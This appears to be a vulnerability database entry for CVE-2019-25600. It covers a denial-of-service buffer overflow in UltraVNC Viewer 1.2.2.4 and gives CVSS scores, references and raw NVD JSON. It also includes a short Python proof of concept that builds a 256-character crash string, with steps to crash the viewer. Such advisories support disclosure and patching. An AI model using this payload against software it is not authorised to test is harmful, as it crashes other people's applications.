CVE-2019-25600

Description

UltraVNC Viewer 1.2.2.4 contains a denial of service vulnerability that allows attackers to crash the application by supplying an oversized string to the VNC Server input field. Attackers can paste a malicious string containing 256 repeated characters into the VNC Server field and click Connect to trigger a buffer overflow that crashes the viewer.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

UltraVNC Viewer 1.2.2.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import pyperclip

# CVE-2019-25600 Proof of Concept
# This script generates a payload to crash UltraVNC Viewer 1.2.2.4

def generate_dos_payload():
    # The vulnerability is triggered by a string of 256 repeated characters
    payload = "A" * 256
    return payload

if __name__ == "__main__":
    try:
        # Generate the malicious string
        crash_string = generate_dos_payload()
        print(f"[*] Payload generated: {len(crash_string)} characters")
        
        # Copy payload to clipboard for simulation
        pyperclip.copy(crash_string)
        print("[*] Payload copied to clipboard.")
        
        print("[+] Reproduction steps:")
        print("1. Open UltraVNC Viewer 1.2.2.4")
        print("2. Paste the payload into the 'VNC Server' input field")
        print("3. Click 'Connect' button")
        print("4. The application should crash due to buffer overflow")
        
    except ImportError:
        print("[-] Error: pyperclip library is missing.")
        print(f"Payload: {crash_string}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25600
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25600
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25600/
[4] VulDB https://vuldb.com/cve/CVE-2019-25600
[5] https://www.exploit-db.com/exploits/46702
[6] https://www.uvnc.com/
[7] https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html
[8] https://www.vulncheck.com/advisories/ultravnc-viewer-denial-of-service-via-buffer-overflow

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25600", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:27.343", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "UltraVNC Viewer 1.2.2.4 contains a denial of service vulnerability that allows attackers to crash the application by supplying an oversized string to the VNC Server input field. Attackers can paste a malicious string containing 256 repeated characters into the VNC Server field and click Connect to trigger a buffer overflow that crashes the viewer."}, {"lang": "es", "value": "UltraVNC Viewer 1.2.2.4 contiene una vulnerabilidad de denegación de servicio que permite a los atacantes bloquear la aplicación al proporcionar una cadena de caracteres excesivamente larga al campo de entrada del servidor VNC. Los atacantes pueden pegar una cadena maliciosa que contenga 256 caracteres repetidos en el campo del servidor VNC y hacer clic en Conectar para desencadenar un desbordamiento de búfer que bloquea el visor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46702", "source": "[email protected]"}, {"url": "https://www.uvnc.com/", "source": "[email protected]"}, {"url": "https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ultravnc-viewer-denial-of-service-via-buffer-overflow", "source": "[email protected]"}]}}